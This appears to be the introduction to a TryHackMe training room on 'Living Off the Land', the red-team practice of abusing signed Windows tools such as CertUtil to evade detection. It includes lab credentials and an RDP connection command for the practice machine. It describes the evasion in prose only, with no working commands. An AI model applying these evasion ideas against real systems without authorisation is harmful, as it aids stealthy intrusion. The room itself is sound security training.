Living Off the Land

What is "Living Off the Land"?

Living Off the Land is a trending term in the red team community. The name is taken from real-life, living by eating the available food on the land. Similarly, adversaries and malware creators take advantage of a target computer's built-in tools and utilities. The term Living Off the Land was introduced at DerbyCon3 (opens in new tab) in 2013 and has gained more traction in the red team community ever since, becoming an often used and popular technique.

These built-in tools perform various regular activities within the target system or network capabilities; however, they are increasingly used and abused, for example, using the CertUtil (opens in new tab)tool to download malicious files into the target machine.

The primary idea is to use Microsoft-signed programs, scripts, and libraries to blend in and evade defensive controls. Red teamers do not want to get detected when executing their engagement activities on the target, so utilizing these tools is safer to maintain their stealth.

The following are some categories that Living Off the Land encompasses:

• Reconnaissance
• Files operations
• Arbitrary code execution
• Lateral movement
• Security product bypass

Learning objectives

• Learn about the term Living Off the Land of red team engagements.
• Learn about the LOLBAS project and how to use it.
• Understand and apply the techniques used in red teaming engagements.

Room prerequisites

•  Basic knowledge of general hacking techniques.
•  Completing the Jr. Penetration Tester Learning Path.
•  TryHackMe Red Team Initial Access module.

We have provided a Windows machine 10 Pro to complete this room. You can use the in-browser feature, or If you prefer to connect via RDP, make sure you deploy the AttackBox or connect to the VPN.

Use the following credentials below.

Machine IP: MACHINE_IP            Username: thm         Password: TryHackM3 

           
			user@machine$ xfreerdp /v:MACHINE_IP /u:thm /p:TryHackM3